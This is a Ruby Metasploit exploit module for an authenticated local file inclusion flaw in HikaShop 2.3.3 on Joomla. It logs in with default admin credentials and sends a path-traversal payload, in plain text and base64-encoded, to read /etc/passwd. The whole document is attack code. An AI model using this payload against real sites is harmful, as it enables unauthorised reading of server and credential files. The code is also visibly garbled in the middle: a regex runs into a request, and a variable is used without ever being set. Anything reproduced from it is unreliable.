## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'HikaShop - LFI poc for authenticated users', 'Description' => %q{ HikaShop 2.3.3 is vulnerable to local file include attack. Authenticated user can read local files from the server. Vulnerability was described on https://twitter.com/HauntITBlog }, 'Author' => [ 'HauntIT Blog', # Discovery / msf module 'http://hauntit.blogspot.com' ], 'License' => MSF_LICENSE, 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => '03.01.2015')) register_options( [ OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']), OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']), OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']), OptRegexp.new('FAILPATTERN', [ false, 'Pattern returned in response if login failed', '/error/'] ), ], self.class) end def check end def fetchMd5(my_string) if my_string =~ /([0-9a-fA-F]{32})/ return $1 end return nil end def exploit # 1st, we will get cookies and token req1 = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,'administrator','index.php') }) cookies = req1['set-cookie'] if not req1 fail_with("[-] Failed with 1st request") end print_status("[+] Resp code: " + req1.code.to_s) print_good("[+] Cookie(s) : " + cookies) token_pattern = /( 'POST', 'uri' => normalize_uri(target_uri.path,'administrator','index.php'), 'cookie' => cookies, 'vars_post' => { 'username' => datastore['USERNAME'], 'passwd' => datastore['PASSWORD'], 'option' => 'com_login', 'task' => 'login', 'return' => 'aW5kZXgucGhwP29wdGlvbj1jb21faGlrYXNob3AmY3RybD12aWV3JnRhc2s9ZWRpdCZpZD0wfGJlZXozfGNvbXBvbmVudHxjb21faGlrYXNob3B8YWRkcmVzc3wuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk', token.to_s => 1 } }) print_good("[+] Code after auth: " + auth.code.to_s) # 3rd step: get + post params to lfi print_status('[+] and now 3rd request...') xpl = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,'administrator','index.php'), 'vars_get' => { 'option' => 'com_hikashop', 'ctrl' => 'view', 'task' => 'edit', 'id' => '0|beez3|component|com_hikashop|address|../../../../../../../../../../../../../../../../../../etc/passwd' }, 'cookie' => cookies }) if xpl print_good("[+] 3rd response code: " + xpl.code.to_s) print_good("[+] 3rd (full) response body:") print_status(xpl.body) else fail_with("[-] Cannot exploit it :C") end end # exploit end